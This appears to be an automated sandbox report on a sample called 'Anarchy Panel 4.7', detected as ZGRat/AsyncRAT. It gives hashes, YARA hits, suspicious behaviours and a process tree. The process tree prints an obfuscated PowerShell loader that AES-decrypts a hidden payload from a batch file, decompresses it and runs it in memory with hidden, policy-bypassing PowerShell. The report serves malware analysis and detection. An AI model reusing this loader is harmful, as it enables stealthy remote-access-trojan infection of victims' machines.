Overview
overview
10Static
static
10Anarchy Panel 4.7.zip
windows7-x64
1Anarchy Panel 4.7.zip
windows10-2004-x64
10Anarchy Pa...el.exe
windows7-x64
10Anarchy Pa...el.exe
windows10-2004-x64
10Anarchy Pa...oG.dll
windows7-x64
1Anarchy Pa...oG.dll
windows10-2004-x64
1Anarchy Pa...uJ.dll
windows7-x64
1Anarchy Pa...uJ.dll
windows10-2004-x64
1Anarchy Pa...qM.dll
windows7-x64
1Anarchy Pa...qM.dll
windows10-2004-x64
1Anarchy Pa...LC.dll
windows7-x64
1Anarchy Pa...LC.dll
windows10-2004-x64
1Anarchy Pa...wp.dll
windows7-x64
1Anarchy Pa...wp.dll
windows10-2004-x64
1Anarchy Pa...uZ.dll
windows7-x64
1Anarchy Pa...uZ.dll
windows10-2004-x64
1Anarchy Pa...nG.dll
windows7-x64
1Anarchy Pa...nG.dll
windows10-2004-x64
1Anarchy Pa...TS.dll
windows7-x64
1Anarchy Pa...TS.dll
windows10-2004-x64
1Anarchy Pa...xj.dll
windows7-x64
1Anarchy Pa...xj.dll
windows10-2004-x64
1Anarchy Pa...pi.dll
windows7-x64
1Anarchy Pa...pi.dll
windows10-2004-x64
1Anarchy Pa...s4.dll
windows7-x64
1Anarchy Pa...s4.dll
windows10-2004-x64
1Anarchy Pa...Ya.dll
windows7-x64
1Anarchy Pa...Ya.dll
windows10-2004-x64
1Anarchy Pa...Jn.dll
windows7-x64
1Anarchy Pa...Jn.dll
windows10-2004-x64
1Anarchy Pa...GA.dll
windows7-x64
1Anarchy Pa...GA.dll
windows10-2004-x64
1Analysis
-
max time kernel
123s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
26-11-2023 16:10
Behavioral task
behavioral1
Sample
Anarchy Panel 4.7.zip
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
Anarchy Panel 4.7.zip
Resource
win10v2004-20231023-en
Behavioral task
behavioral3
Sample
Anarchy Panel 4.7/Anarchy Panel.exe
Resource
win7-20231020-en
Behavioral task
behavioral4
Sample
Anarchy Panel 4.7/Anarchy Panel.exe
Resource
win10v2004-20231020-en
Behavioral task
behavioral5
Sample
Anarchy Panel 4.7/Plugins/0guo3zbo66fqoG.dll
Resource
win7-20231023-en
Behavioral task
behavioral6
Sample
Anarchy Panel 4.7/Plugins/0guo3zbo66fqoG.dll
Resource
win10v2004-20231023-en
Behavioral task
behavioral7
Sample
Anarchy Panel 4.7/Plugins/59Zp7paEHDF7luJ.dll
Resource
win7-20231020-en
Behavioral task
behavioral8
Sample
Anarchy Panel 4.7/Plugins/59Zp7paEHDF7luJ.dll
Resource
win10v2004-20231025-en
Behavioral task
behavioral9
Sample
Anarchy Panel 4.7/Plugins/CjETR6GpGXqM.dll
Resource
win7-20231023-en
Behavioral task
behavioral10
Sample
Anarchy Panel 4.7/Plugins/CjETR6GpGXqM.dll
Resource
win10v2004-20231023-en
Behavioral task
behavioral11
Sample
Anarchy Panel 4.7/Plugins/EVa7gBMKoaHmLC.dll
Resource
win7-20231023-en
Behavioral task
behavioral12
Sample
Anarchy Panel 4.7/Plugins/EVa7gBMKoaHmLC.dll
Resource
win10v2004-20231020-en
Behavioral task
behavioral13
Sample
Anarchy Panel 4.7/Plugins/FBSyChwp.dll
Resource
win7-20231023-en
Behavioral task
behavioral14
Sample
Anarchy Panel 4.7/Plugins/FBSyChwp.dll
Resource
win10v2004-20231020-en
Behavioral task
behavioral15
Sample
Anarchy Panel 4.7/Plugins/G3nl0mDcABnDuZ.dll
Resource
win7-20231020-en
Behavioral task
behavioral16
Sample
Anarchy Panel 4.7/Plugins/G3nl0mDcABnDuZ.dll
Resource
win10v2004-20231025-en
Behavioral task
behavioral17
Sample
Anarchy Panel 4.7/Plugins/KNTmoSnG.dll
Resource
win7-20231023-en
Behavioral task
behavioral18
Sample
Anarchy Panel 4.7/Plugins/KNTmoSnG.dll
Resource
win10v2004-20231023-en
Behavioral task
behavioral19
Sample
Anarchy Panel 4.7/Plugins/PK0TcnqTGFagQTS.dll
Resource
win7-20231025-en
Behavioral task
behavioral20
Sample
Anarchy Panel 4.7/Plugins/PK0TcnqTGFagQTS.dll
Resource
win10v2004-20231020-en
Behavioral task
behavioral21
Sample
Anarchy Panel 4.7/Plugins/RssCnLKcGRxj.dll
Resource
win7-20231023-en
Behavioral task
behavioral22
Sample
Anarchy Panel 4.7/Plugins/RssCnLKcGRxj.dll
Resource
win10v2004-20231023-en
Behavioral task
behavioral23
Sample
Anarchy Panel 4.7/Plugins/WkUP83aP9CABpi.dll
Resource
win7-20231020-en
Behavioral task
behavioral24
Sample
Anarchy Panel 4.7/Plugins/WkUP83aP9CABpi.dll
Resource
win10v2004-20231020-en
Behavioral task
behavioral25
Sample
Anarchy Panel 4.7/Plugins/eMTYbTz0gueNs4.dll
Resource
win7-20231023-en
Behavioral task
behavioral26
Sample
Anarchy Panel 4.7/Plugins/eMTYbTz0gueNs4.dll
Resource
win10v2004-20231023-en
Behavioral task
behavioral27
Sample
Anarchy Panel 4.7/Plugins/fzAgyDYa.dll
Resource
win7-20231020-en
Behavioral task
behavioral28
Sample
Anarchy Panel 4.7/Plugins/fzAgyDYa.dll
Resource
win10v2004-20231020-en
Behavioral task
behavioral29
Sample
Anarchy Panel 4.7/Plugins/mGWHaG2Jn.dll
Resource
win7-20231023-en
Behavioral task
behavioral30
Sample
Anarchy Panel 4.7/Plugins/mGWHaG2Jn.dll
Resource
win10v2004-20231025-en
Behavioral task
behavioral31
Sample
Anarchy Panel 4.7/Plugins/mML6WKMqdxjDGA.dll
Resource
win7-20231020-en
Behavioral task
behavioral32
Sample
Anarchy Panel 4.7/Plugins/mML6WKMqdxjDGA.dll
Resource
win10v2004-20231023-en
General
-
Target
Anarchy Panel 4.7/Anarchy Panel.exe
-
Size
57.8MB
-
MD5
b278ec8cce77cdf9a1d71f19d035226f
-
SHA1
10f10d3cd6dbe6a7dba851ccafa883bf7738c904
-
SHA256
7e12be0dfed24554ac520ec7cf5ec1ee0239727e4f8866ea30a85a56903b219a
-
SHA512
3da33e91e1628097976b6f4fce5020a128a5f1a56242769feacd49f2f67fee23b3ac0361c12f5bd06576b10449712bf7d7545f94a99532113fbb0abff40b2c51
-
SSDEEP
1572864:+j2hoiTM651kZ0gIToFSO9PzN9qUyO0yMS:+j2hoiTz7i77dxPyH6
Malware Config
Signatures
-
Detect ZGRat V1 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe family_zgrat_v1 C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe family_zgrat_v1 C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe family_zgrat_v1 behavioral3/memory/2376-19-0x0000000000ED0000-0x000000000456E000-memory.dmp family_zgrat_v1 -
Async RAT payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe asyncrat C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe asyncrat C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe asyncrat behavioral3/memory/2376-19-0x0000000000ED0000-0x000000000456E000-memory.dmp asyncrat -
.NET Reactor proctector 4 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe net_reactor C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe net_reactor C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe net_reactor behavioral3/memory/2376-19-0x0000000000ED0000-0x000000000456E000-memory.dmp net_reactor -
Executes dropped EXE 1 IoCs
Processes:
Anarchy Panel.exepid process 2376 Anarchy Panel.exe -
Loads dropped DLL 1 IoCs
Processes:
Anarchy Panel.exepid process 2376 Anarchy Panel.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
powershell.exeAnarchy Panel.exepid process 2636 powershell.exe 2376 Anarchy Panel.exe 2376 Anarchy Panel.exe 2376 Anarchy Panel.exe 2376 Anarchy Panel.exe 2376 Anarchy Panel.exe 2376 Anarchy Panel.exe 2376 Anarchy Panel.exe 2376 Anarchy Panel.exe 2376 Anarchy Panel.exe 2376 Anarchy Panel.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
Anarchy Panel.exepowershell.exedescription pid process Token: SeDebugPrivilege 2376 Anarchy Panel.exe Token: SeDebugPrivilege 2636 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
Anarchy Panel.exepid process 2376 Anarchy Panel.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
Anarchy Panel.exepid process 2376 Anarchy Panel.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
Anarchy Panel.execmd.exedescription pid process target process PID 2148 wrote to memory of 2376 2148 Anarchy Panel.exe Anarchy Panel.exe PID 2148 wrote to memory of 2376 2148 Anarchy Panel.exe Anarchy Panel.exe PID 2148 wrote to memory of 2376 2148 Anarchy Panel.exe Anarchy Panel.exe PID 2148 wrote to memory of 2712 2148 Anarchy Panel.exe cmd.exe PID 2148 wrote to memory of 2712 2148 Anarchy Panel.exe cmd.exe PID 2148 wrote to memory of 2712 2148 Anarchy Panel.exe cmd.exe PID 2712 wrote to memory of 1604 2712 cmd.exe cmd.exe PID 2712 wrote to memory of 1604 2712 cmd.exe cmd.exe PID 2712 wrote to memory of 1604 2712 cmd.exe cmd.exe PID 2712 wrote to memory of 2636 2712 cmd.exe powershell.exe PID 2712 wrote to memory of 2636 2712 cmd.exe powershell.exe PID 2712 wrote to memory of 2636 2712 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2376 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\svchost.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2636 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function ZSHdk($KarSC){ $ZfCFn=[System.Security.Cryptography.Aes]::Create(); $ZfCFn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $ZfCFn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $ZfCFn.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('KtZKjEms98+Uz3JdAwXifcpceQe4mGFCZZetPfWLjV8='); $ZfCFn.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('XxhTpYt8KLdLDSpO7hDOxw=='); $tlguC=$ZfCFn.CreateDecryptor(); $return_var=$tlguC.TransformFinalBlock($KarSC, 0, $KarSC.Length); $tlguC.Dispose(); $ZfCFn.Dispose(); $return_var;}function CaoMW($KarSC){ $tLaFs=New-Object System.IO.MemoryStream(,$KarSC); $lDGtw=New-Object System.IO.MemoryStream; Invoke-Expression '$ixeoS #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$tLaFs,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $ixeoS.CopyTo($lDGtw); $ixeoS.Dispose(); $tLaFs.Dispose(); $lDGtw.Dispose(); $lDGtw.ToArray();}function akbWW($KarSC,$vyQOD){ $xXjIa = @( '$qtafy = [System.Reflection.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$KarSC);', '$FBuAc = $qtafy.EntryPoint;', '$FBuAc.Invoke($null, $vyQOD);' ); foreach ($eBUTc in $xXjIa) { Invoke-Expression $eBUTc };}$QCWfW=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Local\Temp\svchost.bat').Split([Environment]::NewLine);foreach ($hgEiC in $QCWfW) { if ($hgEiC.StartsWith('SEROXEN')) { $GFlqW=$hgEiC.Substring(7); break; }}$llOQb=CaoMW (ZSHdk ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($GFlqW)));akbWW $llOQb (,[string[]] ('C:\Users\Admin\AppData\Local\Temp\svchost.bat')); "3⤵PID:1604
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:2688
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
54.6MB
MD594bac1a0cc0dbac256f0d3b4c90648c2
SHA14abcb8a31881e88322f6a37cbb24a14a80c6eef2
SHA25650c2dba1d961e09cb8df397b71bd3b6a32d0ee6dbe886e7309305dc4ba968f94
SHA51230ecee38d5d641abaf73e09a23c614cb3b8b84aa1f8ff1818e92c1f2b51bf6841d3e51564aecb5efd01a3d98db88f0938e7dd4ee9c74ca5477785c33c969ffd9
-
Filesize
54.6MB
MD594bac1a0cc0dbac256f0d3b4c90648c2
SHA14abcb8a31881e88322f6a37cbb24a14a80c6eef2
SHA25650c2dba1d961e09cb8df397b71bd3b6a32d0ee6dbe886e7309305dc4ba968f94
SHA51230ecee38d5d641abaf73e09a23c614cb3b8b84aa1f8ff1818e92c1f2b51bf6841d3e51564aecb5efd01a3d98db88f0938e7dd4ee9c74ca5477785c33c969ffd9
-
Filesize
54.6MB
MD594bac1a0cc0dbac256f0d3b4c90648c2
SHA14abcb8a31881e88322f6a37cbb24a14a80c6eef2
SHA25650c2dba1d961e09cb8df397b71bd3b6a32d0ee6dbe886e7309305dc4ba968f94
SHA51230ecee38d5d641abaf73e09a23c614cb3b8b84aa1f8ff1818e92c1f2b51bf6841d3e51564aecb5efd01a3d98db88f0938e7dd4ee9c74ca5477785c33c969ffd9
-
Filesize
11.9MB
MD52892f2caa15e37c12faea09c6bb5a44a
SHA18f401732b8a3a8b1022ef52836a4e7eac604146a
SHA256c5ece24bcd43419cf718605925b565c17bc668ab7d3801a1d923465b15bd9f1f
SHA51235abceb95d61ba4bfb6facc9559fe4d2db3eec9810bff4230c697864e0bd37e58ec1c1d817a766cfc07b12bed0dfedecfab01179f7295d1118347ba432ee996d
-
Filesize
11.9MB
MD52892f2caa15e37c12faea09c6bb5a44a
SHA18f401732b8a3a8b1022ef52836a4e7eac604146a
SHA256c5ece24bcd43419cf718605925b565c17bc668ab7d3801a1d923465b15bd9f1f
SHA51235abceb95d61ba4bfb6facc9559fe4d2db3eec9810bff4230c697864e0bd37e58ec1c1d817a766cfc07b12bed0dfedecfab01179f7295d1118347ba432ee996d
-
Filesize
1.7MB
MD556a504a34d2cfbfc7eaa2b68e34af8ad
SHA1426b48b0f3b691e3bb29f465aed9b936f29fc8cc
SHA2569309fb2a3f326d0f2cc3f2ab837cfd02e4f8cb6b923b3b2be265591fd38f4961
SHA512170c3645083d869e2368ee16325d7edaeba2d8f1d3d4a6a1054cfdd8616e03073772eeae30c8f79a93173825f83891e7b0e4fd89ef416808359f715a641747d7